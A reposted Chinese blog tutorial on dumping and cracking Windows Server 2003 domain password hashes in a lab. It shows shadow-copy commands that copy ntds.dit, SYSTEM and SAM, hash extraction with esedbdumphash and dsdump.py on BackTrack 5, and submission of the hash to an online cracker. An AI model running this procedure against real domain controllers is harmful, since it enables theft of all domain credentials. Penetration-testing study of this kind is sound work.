码迷,mamicode.com
首页 > Windows程序 > 详细

离线破win2003域账号密码

时间:2014-06-05 14:11:48      阅读:701      评论:0      收藏:0      [点我收藏+]

标签:c   style   blog   a   http   tar   

离线破win2003域账号密码

 

 

国内网站讲了许多方法。把我实验成功的经验跟大家分享。

方法是按照tim的文章操作,链接如下:

http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html

  

  

实验环境:windows server2003,域环境

搭建方法很简单,百度搜搜。

准备工具:vssown.vbs,bt5,ntds_dump_hash.zip

vssown.vbs网上找

http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip

http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

 

 

新建一个域用户xiaocai,密码设为 123abcABC

bubuko.com,布布扣

  

bubuko.com,布布扣

   

win2003下提取文件

  

1、将vssown.vbs拷到域服务器上,比如拷到域服务器的桌面。

2、以管理员身份运行cmd,执行以下命名:

cd 桌面

cscript //nologo vssown.vbs /start 启用

cscript //nologo vssown.vbs /status 查看运行状态

cscript //nologo vssown.vbs /create C 创建快照

bubuko.com,布布扣

  

cscript //nologo vssown.vbs /list 查看创建的快照信息

  

bubuko.com,布布扣

  

这里可以看到系统内部的路径,将两个ntds.ditSYSTEM文件复制到桌面,这里的[X]5代替。

  

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM

  

bubuko.com,布布扣

  

bubuko.com,布布扣

  

提取就文件就结束了。这里尝试的时候经常失败。有空再找找资料到底是什么造成。

  

再把快照删除(这步可选,建议删除掉)

cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D}

 

把这3个生成的文件复制出来。

bubuko.com,布布扣

   

提取HASH

  

先下载工具,BT5,我是用下面这个虚拟机镜相

VMWARE镜像32位:http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

默认登陆密码:root/toor

  

开放ssh服务:(开启服务后可以用Secure CRT进行访问,方便传文件)

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key

sshd-generate

/etc/init.d/ssh restart

bubuko.com,布布扣

  

bubuko.com,布布扣

略掉一个截图

bubuko.com,布布扣

   

ifconfig查看IP

bubuko.com,布布扣

  

接着用Secure CRT访问,

  

bubuko.com,布布扣

  

  

bubuko.com,布布扣

ALT+P 开启SFTP,把文件传到/tmp下

cd /tmp

put SYSTEM ntds.dit ntds_dump_hash.zip

bubuko.com,布布扣

  

切换到BT5系统标签

cd /tmp

ls

bubuko.com,布布扣

#解压 ntds_dump_hash.zip

unzip ntds_dump_hash.zip

  

#编译libesedb

cd libesedb

chmod +x configure

./configure && make

  

#解释数据文件ntds.dit

cd esedbtools

./esedbdumphash ../../ntds.dit

  

#提取hash

cd ../../creddump/

python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable

  

提取出来了,找到,

xiaocai:1109:8A79528CCD6E0DBFFCD6B8DB0F458C37:3B0DE00581A39A49946206E0998B7DF7:::

  

bubuko.com,布布扣

  

破解hash

  

破解hash方法很多,这里采用网站破解。把加粗的那部分放到网站上去破解:http://www.objectif-securite.ch/en/ophcrack.php

bubuko.com,布布扣

  

   

离线破win2003域账号密码,布布扣,bubuko.com

离线破win2003域账号密码

标签:c   style   blog   a   http   tar   

原文地址:http://www.cnblogs.com/pentesterlab-beginner/p/3769093.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!